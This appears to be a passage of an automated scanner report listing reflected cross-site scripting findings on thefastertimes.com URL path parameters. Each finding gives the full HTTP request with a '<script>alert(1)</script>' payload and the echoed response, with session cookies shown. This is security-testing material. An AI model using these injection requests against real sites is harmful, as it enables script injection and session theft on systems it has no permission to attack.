Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d7a"><script>alert(1)</script>ebcd9b22215 was submitted in the REST URL parameter 2. This input was echoed as 89d7a\"><script>alert(1)</script>ebcd9b22215 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b89d7a"><script>alert(1)</script>ebcd9b22215/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:43:36 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:43:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b89d7a\"><script>alert(1)</script>ebcd9b22215/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function
...[SNIP]...

1.98. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b19a"><script>alert(1)</script>5db2c1a0144 was submitted in the REST URL parameter 3. This input was echoed as 5b19a\"><script>alert(1)</script>5db2c1a0144 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/20115b19a"><script>alert(1)</script>5db2c1a0144/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:50:04 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:50:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/20115b19a\"><script>alert(1)</script>5db2c1a0144/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.geti
...[SNIP]...

1.99. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 970f5"><script>alert(1)</script>d569fa43d1a was submitted in the REST URL parameter 4. This input was echoed as 970f5\"><script>alert(1)</script>d569fa43d1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01970f5"><script>alert(1)</script>d569fa43d1a/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:51:34 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:51:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01970f5\"><script>alert(1)</script>d569fa43d1a/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimag
...[SNIP]...

1.100. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e25d"><script>alert(1)</script>4b752dcaa3 was submitted in the REST URL parameter 5. This input was echoed as 6e25d\"><script>alert(1)</script>4b752dcaa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/256e25d"><script>alert(1)</script>4b752dcaa3/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:53:31 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:53:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/256e25d\"><script>alert(1)</script>4b752dcaa3/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesi
...[SNIP]...

1.101. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc0c"><script>alert(1)</script>36af2f7b086 was submitted in the REST URL parameter 6. This input was echoed as acc0c\"><script>alert(1)</script>36af2f7b086 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffmanacc0c"><script>alert(1)</script>36af2f7b086/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:55:01 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:55:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffmanacc0c\"><script>alert(1)</script>36af2f7b086/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20
...[SNIP]...

1.102. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c7fd"><script>alert(1)</script>11e110c29ff was submitted in the REST URL parameter 7. This input was echoed as 7c7fd\"><script>alert(1)</script>11e110c29ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%207c7fd"><script>alert(1)</script>11e110c29ff/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:01:02 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
